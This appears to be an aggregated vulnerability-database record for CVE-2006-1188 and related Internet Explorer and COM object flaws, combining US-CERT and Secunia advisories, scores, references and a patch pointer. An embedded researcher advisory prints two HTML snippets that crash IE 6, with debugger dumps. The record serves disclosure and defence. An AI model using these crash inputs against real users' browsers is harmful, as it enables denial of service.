Details of VAR-200604-0201

ID

VAR-200604-0201

CVE

CVE-2006-1188

TITLE

RDS.Dataspace ActiveX control bypasses ActiveX security model

Trust: 0.8

sources: CERT/CC: VU#234812

DESCRIPTION

Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-101A Microsoft Windows and Internet Explorer Vulnerabilities Original release date: April 11, 2006 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows * Microsoft Internet Explorer For more complete information, refer to the Microsoft Security Bulletin Summary for April 2006. I. (CVE-2006-0012) II. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. An attacker may also be able to cause a denial of service. III. Solution Apply Updates Microsoft has provided updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site. Workarounds Please see the US-CERT Vulnerability Notes for workarounds. Many of these vulnerabilities can be mitigated by following the instructions listed in the Securing Your Web Browser document. Appendix A. Please send email to <cert@cert.org> with "TA06-101A Feedback VU#876678" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History Apr 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt Cg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+ olQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM i+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I R+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh HAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA== =w6IC -----END PGP SIGNATURE----- . Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information. o Memory Corruption Vulnerability: <mshtml.dll>#7d519030 ================================= Following HTML code forces IE 6 to crash: > <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" > "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> > <html> <fieldset> <h4> > <pre><td> > <menu> > <legend> > <a> > <ul> > <small> > <fieldset> > <h6> > </h6 > </u> > </optgroup> > </tr> > </map> > </ul > </dfn> > > </del> > </h2> > </dir> > </ul> Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html These are the register values and the ASM dump at the time of the access violation: > eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 > edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894 > > 7d519012 55 push ebp > 7d519013 8bec mov ebp,esp > 7d519015 8b4104 mov eax,[ecx+0x4] > 7d519018 394508 cmp [ebp+0x8],eax > 7d51901b 7c09 jl mshtml+0x69026 (7d519026) > 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb) > 7d51901f 33c0 xor eax,eax > 7d519021 40 inc eax > 7d519022 5d pop ebp > 7d519023 c20800 ret 0x8 > 7d519026 83c8ff or eax,0xffffffff > 7d519029 ebf7 jmp mshtml+0x69022 (7d519022) > 7d51902b 90 nop > 7d51902c 90 nop > 7d51902d 90 nop > 7d51902e 90 nop > 7d51902f 90 nop > FAULT ->7d519030 8b4108 mov eax,[ecx+0x8] > ds:0023:00000008=???????? > 7d519033 85c0 test eax,eax > 7d519035 7425 jz mshtml+0x6905c (7d51905c) > 7d519037 8b10 mov edx,[eax] > 7d519039 f6c210 test dl,0x10 > 7d51903c 7408 jz mshtml+0x69046 (7d519046) > 7d51903e f6c220 test dl,0x20 > 7d519041 7519 jnz mshtml+0x6905c (7d51905c) > 7d519043 8b400c mov eax,[eax+0xc] > 7d519046 8b4808 mov ecx,[eax+0x8] > 7d519049 85c9 test ecx,ecx o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35 ================================= Following HTML code forces IE 6 to crash: > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > "http://www.w3.org/TR/html4/loose.dtd"> > <bdo> > </span> > <pre> > > <param> > <form> > <colgroup> > <small> > </small> > </colgroup> > </map> > </button> > </code > > <blockquote> > <th> > <small> > > </tbody> > </tr> > </ol> > </tbody> > </ol> > </code> > </strong> > > > <head> > <fieldset> > <style> > > </style > </dir> > </a> > </td > </li> > </label > </object> > </bdo > </th > </object > </q> > > <ol> > <object> Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html These are the register values and the ASM dump at the time of the access violation: > eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 > edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778 > > 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424) > 7d529d13 85c0 test eax,eax > 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2 > (7d5aede0) > 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8] > 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80] > 7d529d26 5e pop esi > 7d529d27 5d pop ebp > 7d529d28 c20c00 ret 0xc > 7d529d2b 90 nop > 7d529d2c 90 nop > 7d529d2d 90 nop > 7d529d2e 90 nop > 7d529d2f 90 nop > 7d529d30 8bff mov edi,edi > 7d529d32 55 push ebp > 7d529d33 8bec mov ebp,esp > FAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14] > ds:0023:00000014=?? > 7d529d39 c1e004 shl eax,0x4 > 7d529d3c 0578aa4b7d add eax,0x7d4baa78 > 7d529d41 7410 jz mshtml+0x79d53 (7d529d53) > 7d529d43 8b400c mov eax,[eax+0xc] > 7d529d46 234508 and eax,[ebp+0x8] > 7d529d49 f7d8 neg eax > 7d529d4b 1bc0 sbb eax,eax > 7d529d4d f7d8 neg eax > 7d529d4f 5d pop ebp > 7d529d50 c20400 ret 0x4 > 7d529d53 33c0 xor eax,eax > 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f) o Vulnerable versions: ===================== The DoS vulnerability was successfully tested on: > MS IE 6 SP2 - Win XP Pro SP2 > MS IE 6 - Win 2k SP4 o Disclosure Timeline: ===================== xx Feb 06 - Vulnerabilities discovered. 08 Mar 06 - Vendor contacted. 22 Mar 06 - Vendor confirmed vulnerabilities. 25 May 06 - Public release. o Solution: ========== Install the latest security update (MS06-013) for Internet Explorer [2]. o Credits: ========= Thomas Waldegger <bugtraq@morph3us.org> BuHa-Security Community - http://buha.info/board/ If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq@morph3us.org' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me. Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa. ---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/ ---------------------------------------------------------------------- TITLE: Microsoft Design Tools msdds.dll Code Execution Vulnerability SECUNIA ADVISORY ID: SA16480 VERIFY ADVISORY: http://secunia.com/advisories/16480/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: Microsoft Visual Studio .NET 2003 http://secunia.com/product/1086/ Microsoft Office 2003 Student and Teacher Edition http://secunia.com/product/2278/ Microsoft Office 2003 Standard Edition http://secunia.com/product/2275/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/ Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 6.x http://secunia.com/product/11/ Microsoft Office 2003 Professional Edition http://secunia.com/product/2276/ Microsoft Office 2003 Small Business Edition http://secunia.com/product/2277/ DESCRIPTION: A vulnerability has been reported in Microsoft Visual Studio .NET, which potentially can be exploited by malicious people to compromise a vulnerable system. The COM object is known to be installed as part of the following products: * Microsoft Visual Studio .NET 2003 * Microsoft Office Professional 2003 Other products may also include the affected COM object. NOTE: An exploit has been published. However, there are currently conflicting reports about the exploitability of this issue. Some reports confirm that code execution is possible, while other reports indicate that the problem can't be reproduced. Secunia has currently not been able to reproduce the vulnerability in version 7.10.3077.0 of the COM object. This advisory will be updated when more information is available. SOLUTION: Restrict use of ActiveX controls to trusted web sites only. PROVIDED AND/OR DISCOVERED BY: Reported by anonymous person. ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Trust: 9.45

sources: NVD: CVE-2006-1188 // CERT/CC: VU#341028 // JVNDB: JVNDB-2006-000174 // CERT/CC: VU#939605 // CERT/CC: VU#876678 // CERT/CC: VU#434641 // CERT/CC: VU#234812 // CERT/CC: VU#641460 // CERT/CC: VU#824324 // CERT/CC: VU#984473 // CERT/CC: VU#680526 // CERT/CC: VU#740372 // BID: 17468 // VULHUB: VHN-17296 // PACKETSTORM: 45345 // PACKETSTORM: 46765 // PACKETSTORM: 39471

AFFECTED PRODUCTS

vendor:	microsoft	model:	-	scope:	-	version:	-	Trust: 7.2
vendor:	microsoft	model:	internet explorer	scope:	eq	version:	6.0	Trust: 1.3
vendor:	microsoft	model:	internet explorer	scope:	eq	version:	6.0.2900.2180	Trust: 1.0
vendor:	microsoft	model:	internet explorer	scope:	eq	version:	5.5	Trust: 1.0
vendor:	microsoft	model:	internet explorer	scope:	eq	version:	6.0.2800.1106	Trust: 1.0
vendor:	microsoft	model:	ie	scope:	eq	version:	6	Trust: 1.0
vendor:	microsoft	model:	ie	scope:	eq	version:	5.1	Trust: 1.0
vendor:	canon	model:	network camera server vb101	scope:	eq	version:	*	Trust: 1.0
vendor:	microsoft	model:	ie	scope:	eq	version:	5.2.3	Trust: 1.0
vendor:	microsoft	model:	internet explorer	scope:	eq	version:	6.0.2800	Trust: 1.0
vendor:	microsoft	model:	internet explorer	scope:	eq	version:	6	Trust: 1.0
vendor:	microsoft	model:	internet explorer	scope:	eq	version:	5.1	Trust: 1.0
vendor:	microsoft	model:	internet explorer	scope:	eq	version:	6.0.2600	Trust: 1.0
vendor:	microsoft	model:	ie	scope:	eq	version:	6.0	Trust: 1.0
vendor:	microsoft	model:	windows server 2003	scope:	eq	version:	none	Trust: 0.8
vendor:	microsoft	model:	windows server 2003	scope:	eq	version:	(itanium)	Trust: 0.8
vendor:	microsoft	model:	windows server 2003	scope:	eq	version:	(x64)	Trust: 0.8
vendor:	microsoft	model:	windows xp	scope:	eq	version:	(x64)	Trust: 0.8
vendor:	microsoft	model:	windows xp	scope:	eq	version:	sp3	Trust: 0.8
vendor:	microsoft	model:	ie	scope:	eq	version:	6.0.2800.1106	Trust: 0.6
vendor:	microsoft	model:	ie	scope:	eq	version:	6.0.2900.2180	Trust: 0.6
vendor:	microsoft	model:	ie	scope:	eq	version:	6.0.2800	Trust: 0.6
vendor:	microsoft	model:	internet explorer sp1	scope:	eq	version:	6.0	Trust: 0.3

sources: CERT/CC: VU#234812 // CERT/CC: VU#876678 // CERT/CC: VU#680526 // CERT/CC: VU#824324 // CERT/CC: VU#641460 // CERT/CC: VU#341028 // CERT/CC: VU#434641 // CERT/CC: VU#740372 // CERT/CC: VU#939605 // BID: 17468 // JVNDB: JVNDB-2006-000174 // CNNVD: CNNVD-200604-164 // NVD: CVE-2006-1188

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2006-1188
value:	HIGH
Trust: 1.0
CARNEGIE MELLON:	VU#876678
value:	35.63
Trust: 0.8
CARNEGIE MELLON:	VU#680526
value:	28.35
Trust: 0.8
CARNEGIE MELLON:	VU#984473
value:	23.01
Trust: 0.8
CARNEGIE MELLON:	VU#824324
value:	13.77
Trust: 0.8
CARNEGIE MELLON:	VU#641460
value:	27.00
Trust: 0.8
CARNEGIE MELLON:	VU#341028
value:	32.40
Trust: 0.8
CARNEGIE MELLON:	VU#434641
value:	25.50
Trust: 0.8
CARNEGIE MELLON:	VU#740372
value:	10.13
Trust: 0.8
CARNEGIE MELLON:	VU#939605
value:	44.55
Trust: 0.8
NVD:	CVE-2006-1188
value:	HIGH
Trust: 0.8
CNNVD:	CNNVD-200604-164
value:	HIGH
Trust: 0.6
VULHUB:	VHN-17296
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2006-1188
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
VULHUB:	VHN-17296
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: CERT/CC: VU#876678 // CERT/CC: VU#680526 // CERT/CC: VU#984473 // CERT/CC: VU#824324 // CERT/CC: VU#641460 // CERT/CC: VU#341028 // CERT/CC: VU#434641 // CERT/CC: VU#740372 // CERT/CC: VU#939605 // VULHUB: VHN-17296 // JVNDB: JVNDB-2006-000174 // CNNVD: CNNVD-200604-164 // NVD: CVE-2006-1188

PROBLEMTYPE DATA

problemtype:

NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2006-1188

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200604-164

TYPE

other

Trust: 0.6

sources: CNNVD: CNNVD-200604-164

CONFIGURATIONS

sources: JVNDB: JVNDB-2006-000174

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-17296

PATCH

title:	MS06-013	url:	http://www.microsoft.com/technet/security/bulletin/MS06-013.mspx	Trust: 0.8
title:	MS06-013	url:	http://www.microsoft.com/japan/technet/security/bulletin/MS06-013.mspx	Trust: 0.8

sources: JVNDB: JVNDB-2006-000174

EXTERNAL IDS

db:	CERT/CC	id:	VU#824324	Trust: 3.4
db:	NVD	id:	CVE-2006-1188	Trust: 3.0
db:	USCERT	id:	TA06-101A	Trust: 2.6
db:	SECUNIA	id:	18957	Trust: 2.5
db:	CERT/CC	id:	VU#959049	Trust: 1.7
db:	VUPEN	id:	ADV-2006-1318	Trust: 1.7
db:	SECTRACK	id:	1015900	Trust: 1.7
db:	CERT/CC	id:	VU#740372	Trust: 1.6
db:	CERT/CC	id:	VU#939605	Trust: 1.6
db:	CERT/CC	id:	VU#680526	Trust: 1.6
db:	BID	id:	17468	Trust: 1.2
db:	CERT/CC	id:	VU#234812	Trust: 0.9
db:	CERT/CC	id:	VU#876678	Trust: 0.9
db:	CERT/CC	id:	VU#984473	Trust: 0.9
db:	CERT/CC	id:	VU#641460	Trust: 0.9
db:	CERT/CC	id:	VU#341028	Trust: 0.9
db:	CERT/CC	id:	VU#434641	Trust: 0.9
db:	SECUNIA	id:	16480	Trust: 0.9
db:	SECUNIA	id:	19583	Trust: 0.8
db:	SECUNIA	id:	18680	Trust: 0.8
db:	SECUNIA	id:	16373	Trust: 0.8
db:	SECUNIA	id:	19269	Trust: 0.8
db:	SECUNIA	id:	19606	Trust: 0.8
db:	SECUNIA	id:	19378	Trust: 0.8
db:	BID	id:	17181	Trust: 0.8
db:	BID	id:	14594	Trust: 0.8
db:	XF	id:	21895	Trust: 0.8
db:	SECTRACK	id:	1014727	Trust: 0.8
db:	XF	id:	21193	Trust: 0.8
db:	BID	id:	14087	Trust: 0.8
db:	SECUNIA	id:	15891	Trust: 0.8
db:	OSVDB	id:	17680	Trust: 0.8
db:	SECTRACK	id:	1014329	Trust: 0.8
db:	USCERT	id:	SA06-101A	Trust: 0.8
db:	JVNDB	id:	JVNDB-2006-000174	Trust: 0.8
db:	CNNVD	id:	CNNVD-200604-164	Trust: 0.7
db:	EXPLOIT-DB	id:	1838	Trust: 0.1
db:	VULHUB	id:	VHN-17296	Trust: 0.1
db:	CERT/CC	id:	VU#503124	Trust: 0.1
db:	PACKETSTORM	id:	45345	Trust: 0.1
db:	PACKETSTORM	id:	46765	Trust: 0.1
db:	PACKETSTORM	id:	39471	Trust: 0.1

sources: CERT/CC: VU#234812 // CERT/CC: VU#876678 // CERT/CC: VU#680526 // CERT/CC: VU#984473 // CERT/CC: VU#824324 // CERT/CC: VU#641460 // CERT/CC: VU#341028 // CERT/CC: VU#434641 // CERT/CC: VU#740372 // CERT/CC: VU#939605 // VULHUB: VHN-17296 // BID: 17468 // JVNDB: JVNDB-2006-000174 // PACKETSTORM: 45345 // PACKETSTORM: 46765 // PACKETSTORM: 39471 // CNNVD: CNNVD-200604-164 // NVD: CVE-2006-1188

REFERENCES

url:	http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx	Trust: 2.8
url:	http://www.us-cert.gov/cas/techalerts/ta06-101a.html	Trust: 2.5
url:	http://www.kb.cert.org/vuls/id/824324	Trust: 2.5
url:	http://www.securityfocus.com/archive/1/435096/30/4710/threaded	Trust: 1.7
url:	https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-013	Trust: 1.7
url:	https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1144	Trust: 1.7
url:	https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1290	Trust: 1.7
url:	https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1296	Trust: 1.7
url:	https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1773	Trust: 1.7
url:	http://securitytracker.com/id?1015900	Trust: 1.7
url:	http://secunia.com/advisories/18957	Trust: 1.7
url:	http://www.vupen.com/english/advisories/2006/1318	Trust: 1.7
url:	http://www.kb.cert.org/vuls/id/959049	Trust: 1.6
url:	http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx	Trust: 1.6
url:	http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx	Trust: 1.6
url:	about vulnerability notes	Trust: 1.6
url:	contact us about this vulnerability	Trust: 1.6
url:	provide a vendor statement	Trust: 1.6
url:	http://secunia.com/advisories/16480/	Trust: 0.9
url:	http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx	Trust: 0.8
url:	http://secunia.com/advisories/19583/	Trust: 0.8
url:	http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarmdac/html/msdn_remtdata.asp	Trust: 0.8
url:	http://www.microsoft.com/technet/security/advisory/917077.mspx	Trust: 0.8
url:	http://secunia.com/advisories/18680/	Trust: 0.8
url:	http://blogs.technet.com/msrc/archive/2006/03/22/422849.aspx	Trust: 0.8
url:	http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/createtextrange.asp	Trust: 0.8
url:	http://www.microsoft.com/com/default.mspx	Trust: 0.8
url:	http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp	Trust: 0.8
url:	http://support.microsoft.com/kb/159621	Trust: 0.8
url:	http://support.microsoft.com/kb/216434	Trust: 0.8
url:	http://www.securityfocus.com/archive/1/391803	Trust: 0.8
url:	http://www.kb.cert.org/vuls/id/939605	Trust: 0.8
url:	http://www.kb.cert.org/vuls/id/740372	Trust: 0.8
url:	http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx	Trust: 0.8
url:	http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx	Trust: 0.8
url:	http://secunia.com/advisories/16373/	Trust: 0.8
url:	http://secunia.com/advisories/19269/	Trust: 0.8
url:	http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx	Trust: 0.8
url:	http://support.microsoft.com/kb/918165	Trust: 0.8
url:	http://secunia.com/advisories/19606/	Trust: 0.8
url:	http://jeffrey.vanderstad.net/grasshopper/	Trust: 0.8
url:	http://secunia.com/advisories/19378/	Trust: 0.8
url:	http://www.securityfocus.com/bid/17181	Trust: 0.8
url:	http://www.microsoft.com/technet/security/advisory/906267.mspx	Trust: 0.8
url:	http://www.kb.cert.org/vuls/id/680526	Trust: 0.8
url:	http://www.securityfocus.com/bid/14594	Trust: 0.8
url:	http://www.securitytracker.com/alerts/2005/aug/1014727.html	Trust: 0.8
url:	http://xforce.iss.net/xforce/xfdb/21895	Trust: 0.8
url:	http://www.microsoft.com/technet/security/advisory/903144.mspx	Trust: 0.8
url:	http://www.sec-consult.com/184.html	Trust: 0.8
url:	http://secunia.com/advisories/15891/	Trust: 0.8
url:	http://www.securitytracker.com/alerts/2005/jun/1014329.html	Trust: 0.8
url:	http://www.osvdb.org/displayvuln.php?osvdb_id=17680	Trust: 0.8
url:	http://www.securityfocus.com/bid/14087	Trust: 0.8
url:	http://xforce.iss.net/xforce/xfdb/21193	Trust: 0.8
url:	http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120	Trust: 0.8
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188	Trust: 0.8
url:	http://www.frsirt.com/english/advisories/2006/1318	Trust: 0.8
url:	http://jvn.jp/cert/jvnta06-101a/index.html	Trust: 0.8
url:	http://jvn.jp/tr/trta06-101a/	Trust: 0.8
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-1188	Trust: 0.8
url:	http://secunia.com/advisories/18957/	Trust: 0.8
url:	http://www.securityfocus.com/bid/17468	Trust: 0.8
url:	http://www.us-cert.gov/cas/alerts/sa06-101a.html	Trust: 0.8
url:	http://xforce.iss.net/xforce/alerts/id/220	Trust: 0.8
url:	http://xforce.iss.net/xforce/alerts/id/217	Trust: 0.8
url:	http://www.mozilla.com/	Trust: 0.3
url:	/archive/1/435096	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/641460>	Trust: 0.1
url:	https://update.microsoft.com/microsoftupdate>	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1189>	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0003>	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1185>	Trust: 0.1
url:	http://www.kb.cert.org/vuls/id/984473>	Trust: 0.1
url:	http://www.kb.cert.org/vuls/id/341028>	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1388>	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0012>	Trust: 0.1
url:	http://www.us-cert.gov/reading_room/securing_browser/#internet_ex	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188>	Trust: 0.1
url:	http://www.us-cert.gov/cas/signup.html>.	Trust: 0.1
url:	http://www.kb.cert.org/vuls/id/234812>	Trust: 0.1
url:	http://www.kb.cert.org/vuls/id/434641>	Trust: 0.1
url:	http://www.kb.cert.org/vuls/id/824324>	Trust: 0.1
url:	http://www.us-cert.gov/cas/techalerts/ta06-101a.html>	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1359>	Trust: 0.1
url:	http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx>	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1245>	Trust: 0.1
url:	http://www.kb.cert.org/vuls/id/503124>	Trust: 0.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1186>	Trust: 0.1
url:	http://www.kb.cert.org/vuls/id/876678>	Trust: 0.1
url:	http://www.kb.cert.org/vuls/id/959049>	Trust: 0.1
url:	http://www.us-cert.gov/legal.html>	Trust: 0.1
url:	http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html	Trust: 0.1
url:	http://en.wikipedia.org/wiki/internet_explorer	Trust: 0.1
url:	http://www.microsoft.com/windows/ie/default.mspx	Trust: 0.1
url:	http://morph3us.org/advisories/20060525-msie6-sp2-2.txt	Trust: 0.1
url:	http://www.w3.org/tr/html4/loose.dtd">	Trust: 0.1
url:	http://buha.info/board/	Trust: 0.1
url:	http://www.microsoft.com/windows/ie/	Trust: 0.1
url:	http://morph3us.org/	Trust: 0.1
url:	http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">	Trust: 0.1
url:	http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188	Trust: 0.1
url:	http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html	Trust: 0.1
url:	http://secunia.com/secunia_security_advisories/	Trust: 0.1
url:	http://secunia.com/product/10/	Trust: 0.1
url:	http://secunia.com/product/2276/	Trust: 0.1
url:	http://secunia.com/product/9/	Trust: 0.1
url:	http://secunia.com/product/2277/	Trust: 0.1
url:	http://secunia.com/product/11/	Trust: 0.1
url:	http://secunia.com/secunia_vacancies/	Trust: 0.1
url:	http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org	Trust: 0.1
url:	http://secunia.com/product/2278/	Trust: 0.1
url:	http://secunia.com/product/2275/	Trust: 0.1
url:	http://secunia.com/about_secunia_advisories/	Trust: 0.1
url:	http://secunia.com/product/1086/	Trust: 0.1

CREDITS

Thomas Waldegger※ bugtraq@morph3us.org

Trust: 0.6

sources: CNNVD: CNNVD-200604-164

SOURCES

db:	CERT/CC	id:	VU#234812
db:	CERT/CC	id:	VU#876678
db:	CERT/CC	id:	VU#680526
db:	CERT/CC	id:	VU#984473
db:	CERT/CC	id:	VU#824324
db:	CERT/CC	id:	VU#641460
db:	CERT/CC	id:	VU#341028
db:	CERT/CC	id:	VU#434641
db:	CERT/CC	id:	VU#740372
db:	CERT/CC	id:	VU#939605
db:	VULHUB	id:	VHN-17296
db:	BID	id:	17468
db:	JVNDB	id:	JVNDB-2006-000174
db:	PACKETSTORM	id:	45345
db:	PACKETSTORM	id:	46765
db:	PACKETSTORM	id:	39471
db:	CNNVD	id:	CNNVD-200604-164
db:	NVD	id:	CVE-2006-1188

LAST UPDATE DATE

2024-09-19T21:24:10.178000+00:00

SOURCES UPDATE DATE

db:	CERT/CC	id:	VU#234812	date:	2006-11-02T00:00:00
db:	CERT/CC	id:	VU#876678	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#680526	date:	2007-10-11T00:00:00
db:	CERT/CC	id:	VU#984473	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#824324	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#641460	date:	2006-05-15T00:00:00
db:	CERT/CC	id:	VU#341028	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#434641	date:	2006-04-12T00:00:00
db:	CERT/CC	id:	VU#740372	date:	2005-10-13T00:00:00
db:	CERT/CC	id:	VU#939605	date:	2005-07-12T00:00:00
db:	VULHUB	id:	VHN-17296	date:	2018-10-18T00:00:00
db:	BID	id:	17468	date:	2006-05-26T19:48:00
db:	JVNDB	id:	JVNDB-2006-000174	date:	2007-04-01T00:00:00
db:	CNNVD	id:	CNNVD-200604-164	date:	2021-07-27T00:00:00
db:	NVD	id:	CVE-2006-1188	date:	2021-07-23T15:04:41.580

SOURCES RELEASE DATE

db:	CERT/CC	id:	VU#234812	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#876678	date:	2006-03-23T00:00:00
db:	CERT/CC	id:	VU#680526	date:	2005-08-19T00:00:00
db:	CERT/CC	id:	VU#984473	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#824324	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#641460	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#341028	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#434641	date:	2006-04-11T00:00:00
db:	CERT/CC	id:	VU#740372	date:	2005-08-18T00:00:00
db:	CERT/CC	id:	VU#939605	date:	2005-07-02T00:00:00
db:	VULHUB	id:	VHN-17296	date:	2006-04-11T00:00:00
db:	BID	id:	17468	date:	2006-04-11T00:00:00
db:	JVNDB	id:	JVNDB-2006-000174	date:	2007-04-01T00:00:00
db:	PACKETSTORM	id:	45345	date:	2006-04-12T04:12:55
